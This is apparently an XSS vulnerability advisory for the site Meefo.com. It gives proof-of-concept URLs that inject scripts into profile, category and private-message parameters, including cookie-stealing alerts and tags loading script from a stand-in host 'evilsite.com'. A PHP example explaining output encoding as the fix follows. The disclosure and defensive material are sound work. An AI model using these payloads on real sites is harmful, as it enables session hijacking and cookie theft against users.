Meefo.com
Homepage: http://meefo.com

Affected files:
reading profiles
index.php
input boxes on profiles
sending private msgs

------------------------------

Reading a profile and with cookie include PoC:

Since data isn't properly filtered (backslashes are added to ' and "), a user can input malicious data, such as <script>alert(document.cookie)</script> and it will pop up with the user's cookie. Included at the end of this article are screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.

http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script>

When editing your profile, data isn't properly filtered in the input boxes either, so <script>alert(document.cookie)</script> works here too.

Another XSS Vulnerability example:

http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>

Reading categories XSS Vuln:

http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>

Sending PM's XSS Vuln:

http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>

Screenshots of cookie include vulns & more:

http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg
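
Why the backslash filtering does not help, and what the fix looks like. This is an added example, not code from the advisory or from Meefo: it assumes a PHP backend (suggested by index.php), uses addslashes() as a stand-in for the filtering described above, and all function names are hypothetical.

```php
<?php
// Added illustration, not Meefo's code. addslashes() stands in for the
// backslash filtering the advisory describes; function names are hypothetical.

// Weak: escapes ' " and \ only, so < and > reach the page unchanged.
function render_profile_weak(string $user): string {
    return '<h1>Profile of ' . addslashes($user) . '</h1>';
}

// Hardened: encode for the HTML context at the point of output.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_profile_safe(string $user): string {
    return '<h1>Profile of ' . h($user) . '</h1>';
}

// Defence in depth: reject names outside an assumed allowlist before lookup.
function is_valid_username(string $user): bool {
    return preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $user) === 1;
}

// True when the rendered markup still contains a script element.
function has_live_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

// Parameter values (user_pp, cat) taken from the advisory's PoC URLs,
// plus one benign name for comparison.
$samples = [
    'username<script>alert(document.cookie)</script>',
    '<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>',
    'Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>',
    'username',
];

foreach ($samples as $value) {
    printf("%-56s weak:%-5s safe:%-5s valid:%s\n",
        $value,
        has_live_script(render_profile_weak($value)) ? 'LIVE' : 'inert',
        has_live_script(render_profile_safe($value)) ? 'LIVE' : 'inert',
        is_valid_username($value) ? 'yes' : 'no');
}
```

None of the PoC values contain a quote character, which is why quote escaping leaves them intact. Marking the session cookie HttpOnly additionally keeps it out of document.cookie if an encoding gap remains elsewhere.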